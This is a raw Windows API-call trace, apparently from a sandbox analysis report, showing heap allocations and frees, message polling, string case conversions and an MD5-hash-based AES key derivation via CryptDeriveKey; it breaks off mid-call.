CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0261.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.057] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0261.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.058] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.058] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.058] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.058] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.058] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0261.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.059] CryptHashData (hHash=0xaa58a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0261.059] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0261.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.060] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.060] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.061] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.061] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.061] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.061] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.061] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.061] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.061] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.062] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.062] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0261.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.065] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.066] HeapFree (in: 